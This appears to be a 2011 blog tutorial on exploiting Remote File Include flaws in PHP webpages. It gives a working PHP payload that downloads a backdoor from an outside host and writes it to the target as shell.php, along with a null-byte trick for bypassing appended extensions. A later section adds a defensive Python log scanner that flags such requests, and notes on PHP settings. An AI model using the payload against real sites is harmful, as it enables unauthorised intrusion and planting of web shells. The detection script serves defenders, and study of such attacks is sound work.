Saturday, 5 March 2011
How to exploit RFI (Remote File Include) vulnerability on webpages.
Hi everyone, this post is really similar to the one that I just made (LFI); the only difference is that you can include your own code on the remote server more easily.
So, this is our vulnerable webpage:
But instead of loading the file color.css, we will load our own code into that box, like this:
The content of evil3.txt is:
<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>
Notice that the extension of the file is .txt. There is a reason for that: if you use .php, the code will be interpreted by the pentest server instead of the target server. Don't forget to use .txt for your evil code.
Great, we just uploaded our shell to the server. Now browse to it: http://mytargettest.com/hacktest/shell.php
Now you can just repeat what I did in the LFI post to get your real shell on the server.
Another tip: some developers append an extension, like .css or .php or any other extension, to the included name. So how can we avoid that? You just add a null byte at the end of the URL.
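Seen from the defending side, both the remote include and the null-byte trick described above leave a recognisable trace in the web server's access log. The following is an added example, not code from the original post, that flags such requests; the script name index.php, the parameter name page, the host names and the log lines are all constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A parameter value that starts with a remote URL scheme is the RFI signature.
REMOTE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)
# Pulls the request target out of a common/combined log format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def inspect_request(target):
    """Return a list of (parameter, reason) findings for one request target."""
    findings = []
    query = urlsplit(target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decoded once already; decode again to catch %2500.
        value = unquote(raw)
        if REMOTE.search(value):
            findings.append((name, "remote-url"))
        if "\x00" in value:
            findings.append((name, "null-byte"))
    return findings


def scan_log(lines):
    """Return (client_ip, target, findings) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        findings = inspect_request(m.group(1))
        if findings:
            hits.append((line.split()[0], m.group(1), findings))
    return hits


# Constructed sample access-log lines, not taken from the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Mar/2011:10:00:01 +0000] "GET /hacktest/index.php?page=color.css HTTP/1.1" 200 512',
    '192.0.2.66 - - [05/Mar/2011:10:02:13 +0000] "GET /hacktest/index.php?page=http://attacker.example/evil3.txt HTTP/1.1" 200 87',
    '192.0.2.66 - - [05/Mar/2011:10:02:40 +0000] "GET /hacktest/index.php?page=http://attacker.example/evil3.txt%00 HTTP/1.1" 200 87',
    '192.0.2.10 - - [05/Mar/2011:10:03:05 +0000] "GET /hacktest/index.php?ref=blog&page=color.css HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, findings)
```

On the server itself, the remote include only works when PHP's allow_url_include setting is on (it is off by default since PHP 5.2), and PHP 5.3.4 and later reject paths that contain a null byte.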